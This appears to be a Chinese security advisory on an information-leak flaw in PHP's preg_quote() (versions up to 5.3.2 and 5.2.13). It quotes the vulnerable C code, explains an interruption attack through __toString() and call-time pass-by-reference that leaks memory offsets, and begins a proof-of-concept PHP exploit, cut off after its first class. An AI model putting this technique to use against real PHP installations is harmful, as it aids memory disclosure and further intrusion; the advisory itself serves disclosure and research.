发布日期:2010-05-07
更新日期:2010-05-10
受影响系统:
PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
描述:
--------------------------------------------------------------------------------
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的preg_quote()函数中存在信息泄露漏洞:
static PHP_FUNCTION(preg_quote)
{
...
/* Get the arguments and check for errors */
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|s", &in_str, &in_str_len,
&delim, &delim_len) == FAILURE) {
return;
}
in_str_end = in_str + in_str_len;
...
if (delim && *delim) {
delim_char = delim[0];
quote_delim = 1;
}
/* Allocate enough memory so that even if each character
is quoted, we won't run out of room */
out_str = safe_emalloc(4, in_str_len, 1);
/* Go through the string and quote necessary characters */
for(p = in_str, q = out_str; p != in_str_end; p++) {
c = *p;
switch(c) {
case '.':
...
case '-':
*q++ = '\';
*q++ = c;
break;
case '\0':
*q++ = '\';
*q++ = '0';
*q++ = '0';
*q++ = '0';
break;
default:
if (quote_delim && c == delim_char)
*q++ = '\';
*q++ = c;
break;
}
}
*q = '\0';
/* Reallocate string and return it */
RETVAL_STRINGL(erealloc(out_str, q - out_str + 1), q - out_str, 0);
zend_parse_parameters()函数将字符串指针、长度和ineger参数拷贝到了本地变量,放松了这些变量与原始ZVAL之间的联系。问题是任何对ZVAL的修改都不会反映在本地变量上,因此任何中断都可能修改ZVAL,导致本地变量指向已释放和重新使用的内存。此外由于zend_parse_parameters()支持对象的__toString()方式,只要以preg_quote()第三个参数的形式传送对象就可以中断参数解析。由于PHP的call time pass by reference功能,之后攻击者可以从__toString()方式杀死preg_quote()的第一个参数并重新用于哈希表。这导致preg_quote()作用于哈希表的内存而不是字符串的内存,攻击者可以泄露重要的内部内存偏移。
<*来源:Stefan Esser (s.esser@ematters.de)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
class dummy
{
function __toString()
{
/* now the magic */
parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);
return "";
}
}